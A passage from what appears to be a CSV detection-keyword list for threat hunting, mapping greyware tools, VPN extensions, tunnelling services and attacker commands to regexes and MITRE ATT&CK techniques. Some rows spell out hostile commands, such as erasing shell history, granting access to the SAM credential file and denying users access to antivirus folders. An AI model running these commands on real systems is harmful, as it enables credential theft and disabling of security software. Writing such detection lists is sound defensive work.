"*knajdeaocbpmfghhmijicidfcmdgbdpm*",".{0,1000}knajdeaocbpmfghhmijicidfcmdgbdpm.{0,1000}","greyware_tool_keyword","Guru VPN & Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*hackforums.net/*",".{0,1000}hackforums\.net\/.{0,1000}","greyware_tool_keyword","hackforums.net","Hack Forums - a well-known online community frequently referenced in various pieces of malicious code","T1588.003","TA0011","N/A","N/A","Exploitation tool","hackforums.net","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*keodbianoliadkoelloecbhllnpiocoi*",".{0,1000}keodbianoliadkoelloecbhllnpiocoi.{0,1000}","greyware_tool_keyword","Hide My IP VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*amnoibeflfphhplmckdbiajkjaoomgnj*",".{0,1000}amnoibeflfphhplmckdbiajkjaoomgnj.{0,1000}","greyware_tool_keyword","HideAll VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*dbdbnchagbkhknegmhgikkleoogjcfge*",".{0,1000}dbdbnchagbkhknegmhgikkleoogjcfge.{0,1000}","greyware_tool_keyword","Hideman 
VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*history -d -2 && history -d -1*",".{0,1000}history\s\-d\s\-2\s\&\&\shistory\s\-d\s\-1.{0,1000}","greyware_tool_keyword","history","Removes the most recently logged command.","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*poeojclicodamonabcabmapamjkkmnnk*",".{0,1000}poeojclicodamonabcabmapamjkkmnnk.{0,1000}","greyware_tool_keyword","HMA VPN Proxy Unblocker","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","#registry","N/A","8","10","N/A","N/A","N/A","N/A" "*gkojfkhlekighikafcpjkiklfbnlmeio*",".{0,1000}gkojfkhlekighikafcpjkiklfbnlmeio.{0,1000}","greyware_tool_keyword","Hola Free VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","#registry","N/A","8","10","N/A","N/A","N/A","N/A" 
"*kcdahmgmaagjhocpipbodaokikjkampi*",".{0,1000}kcdahmgmaagjhocpipbodaokikjkampi.{0,1000}","greyware_tool_keyword","Hola VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","#registry","N/A","8","10","N/A","N/A","N/A","N/A" "*homeassistant.local:8123*",".{0,1000}homeassistant\.local\:8123.{0,1000}","greyware_tool_keyword","homeway.io","Expose local servers to the internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://homeway.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://homeway.io/install.sh*",".{0,1000}https\:\/\/homeway\.io\/install\.sh.{0,1000}","greyware_tool_keyword","homeway.io","Expose local servers to the internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://homeway.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ejkaocphofnobjdedneohbbiilggdlbi*",".{0,1000}ejkaocphofnobjdedneohbbiilggdlbi.{0,1000}","greyware_tool_keyword","Hotspot Shield Elite VPN Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","#registry","N/A","8","10","N/A","N/A","N/A","N/A" "*nlbejmccbhkncgokjcmghpfloaajcffj*",".{0,1000}nlbejmccbhkncgokjcmghpfloaajcffj.{0,1000}","greyware_tool_keyword","Hotspot Shield Free VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data 
Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","#registry","N/A","8","10","N/A","N/A","N/A","N/A" "*nbcojefnccbanplpoffopkoepjmhgdgh*",".{0,1000}nbcojefnccbanplpoffopkoepjmhgdgh.{0,1000}","greyware_tool_keyword","Hoxx VPN Proxy","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","#registry","N/A","8","10","N/A","N/A","N/A","N/A" "*python -m http.server*",".{0,1000}python\s\-m\shttp\.server.{0,1000}","greyware_tool_keyword","http.server","setup a simple http server","T1071.001 - T1105 - T1213","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://x.com/mthcht/status/1827714529687658796","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*python3 -m http.server*",".{0,1000}python\s\-m\shttp\.server.{0,1000}","greyware_tool_keyword","http.server","setup a simple http server","T1071.001 - T1105 - T1213","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://x.com/mthcht/status/1827714529687658796","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*lneaocagcijjdpkcabeanfpdbmapcjjg*",".{0,1000}lneaocagcijjdpkcabeanfpdbmapcjjg.{0,1000}","greyware_tool_keyword","Hub VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","#registry","N/A","8","10","N/A","N/A","N/A","N/A" "*curl 
https://api.hunter.io/v2/domain-search?domain=*",".{0,1000}curl\shttps\:\/\/api\.hunter\.io\/v2\/domain\-search\?domain\=.{0,1000}","greyware_tool_keyword","Hunter.io","used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business","T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Reconnaissance","https://hunter.io/","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A" "*curl https://api.hunter.io/v2/email-finder?domain=*",".{0,1000}curl\shttps\:\/\/api\.hunter\.io\/v2\/email\-finder\?domain\=.{0,1000}","greyware_tool_keyword","Hunter.io","used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business","T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Reconnaissance","https://hunter.io/","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A" "*curl https://api.hunter.io/v2/email-verifier?email=*",".{0,1000}curl\shttps\:\/\/api\.hunter\.io\/v2\/email\-verifier\?email\=.{0,1000}","greyware_tool_keyword","Hunter.io","used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business","T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Reconnaissance","https://hunter.io/","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A" "*https://api.hunter.io/*",".{0,1000}https\:\/\/api\.hunter\.io\/.{0,1000}","greyware_tool_keyword","Hunter.io","used by attacker and pentester while gathering information. 
Hunter lets you find email addresses in seconds and connect with the people that matter for your business","T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Reconnaissance","https://hunter.io/","1","1","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A" "*https://hunter.io/*",".{0,1000}https\:\/\/hunter\.io\/.{0,1000}","greyware_tool_keyword","Hunter.io","used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business","T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Reconnaissance","https://hunter.io/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hypertunnel.git*",".{0,1000}\/hypertunnel\.git.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","1","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z" "*/hypertunnel-tcp-relay*.tar.gz*",".{0,1000}\/hypertunnel\-tcp\-relay.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","1","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z" "*/hypertunnel-tcp-relay*.zip*",".{0,1000}\/hypertunnel\-tcp\-relay.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","1","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z" 
"*23fe91b0f562494d22d23a02a05f35847520170930ceb92cffa6783229b46d78*",".{0,1000}23fe91b0f562494d22d23a02a05f35847520170930ceb92cffa6783229b46d78.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","0","#filehash","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z" "*berstend/hypertunnel*",".{0,1000}berstend\/hypertunnel.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","1","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z" "*https://hypertunnel.ga*",".{0,1000}https\:\/\/hypertunnel\.ga.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","1","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z" "*hypertunnel.lvh.me*",".{0,1000}hypertunnel\.lvh\.me.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","1","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z" "*hypertunnel-server@latest*",".{0,1000}hypertunnel\-server\@latest.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","1","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z" "*local.hypertunnel.lvh.me*",".{0,1000}local\.hypertunnel\.lvh\.me.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 
- T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","0","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z" "*MIIJKgIBAAKCAgEAuvAs1YNtpCaqyG3Rkyutst3uIjzYLQTPWf1v+OLi3GgzshUB*",".{0,1000}MIIJKgIBAAKCAgEAuvAs1YNtpCaqyG3Rkyutst3uIjzYLQTPWf1v\+OLi3GgzshUB.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","0","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z" "*npm install hypertunnel-server*",".{0,1000}npm\sinstall\shypertunnel\-server.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","0","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z" "*packages/hypertunnel/*",".{0,1000}packages\/hypertunnel\/.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","1","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z" "*packages/hypertunnel-server*",".{0,1000}packages\/hypertunnel\-server.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","1","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z" "*packages/hypertunnel-tcp-relay*",".{0,1000}packages\/hypertunnel\-tcp\-relay.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","1","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z" "*icacls ""%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"" 2>nul*",".{0,1000}icacls\s\""\%appdata\%\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\""\s2\>nul.{0,1000}","greyware_tool_keyword","icacls","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z" "*icacls ""%programdata%\Microsoft\Windows\Start Menu\Programs\Startup"" 2>nul*",".{0,1000}icacls\s\""\%programdata\%\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\""\s2\>nul.{0,1000}","greyware_tool_keyword","icacls","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z" "*icacls ""%programdata%\Microsoft\Windows\Start Menu\Programs\Startup\*"" 2>nul*",".{0,1000}icacls\s\""\%programdata\%\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\.{0,1000}\""\s2\>nul.{0,1000}","greyware_tool_keyword","icacls","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z" "*icacls ""C:\Documents and Settings\%username%\Start Menu\Programs\Startup"" 2>nul*",".{0,1000}icacls\s\""C\:\\Documents\sand\sSettings\\\%username\%\\Start\sMenu\\Programs\\Startup\""\s2\>nul.{0,1000}","greyware_tool_keyword","icacls","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z" "*icacls ""C:\Documents and Settings\%username%\Start Menu\Programs\Startup\*"" 2>nul*",".{0,1000}icacls\s\""C\:\\Documents\sand\sSettings\\\%username\%\\Start\sMenu\\Programs\\Startup\\.{0,1000}\""\s2\>nul.{0,1000}","greyware_tool_keyword","icacls","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z" "*icacls ""C:\Documents and Settings\All Users\Start Menu\Programs\Startup"" 2>nul*",".{0,1000}icacls\s\""C\:\\Documents\sand\sSettings\\All\sUsers\\Start\sMenu\\Programs\\Startup\""\s2\>nul.{0,1000}","greyware_tool_keyword","icacls","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z" "*icacls ""C:\Documents and Settings\All Users\Start Menu\Programs\Startup\*"" 2>nul*",".{0,1000}icacls\s\""C\:\\Documents\sand\sSettings\\All\sUsers\\Start\sMenu\\Programs\\Startup\\.{0,1000}\""\s2\>nul.{0,1000}","greyware_tool_keyword","icacls","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z" "*icacls ""C:\windows\system32\config\SAM"" /grant*",".{0,1000}icacls\s\""C\:\\windows\\system32\\config\\SAM\""\s\/grant.{0,1000}","greyware_tool_keyword","icalcs","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z" "*icacls *(x86)\360"" * /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\(x86\)\\360\""\s.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*icacls *\360safe* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\360safe.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*icacls *\AVAST Software* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\AVAST\sSoftware.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*icacls *\AVG""* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\AVG\"".{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware 
behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*icacls *\Avira* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\Avira.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*icacls *\Cezurity* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\Cezurity.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*icacls *\COMODO* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\COMODO.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*icacls *\Doctor Web* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\Doctor\sWeb.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware 
behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*icacls *\Enigma Software Group* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\Enigma\sSoftware\sGroup.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*icacls *\ESET* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\ESET.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*icacls *\GRIZZLY Antivirus* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\GRIZZLY\sAntivirus.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*icacls *\grizzly* /deny 
%username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\grizzly.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*icacls *\Kaspersky Lab* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\Kaspersky\sLab.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*icacls *\Malwarebytes* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\Malwarebytes.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*icacls *\Malwarebytes* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\Malwarebytes.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense 
Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*icacls *\McAfee* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\McAfee.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*icacls *\Norton* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\Norton.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense 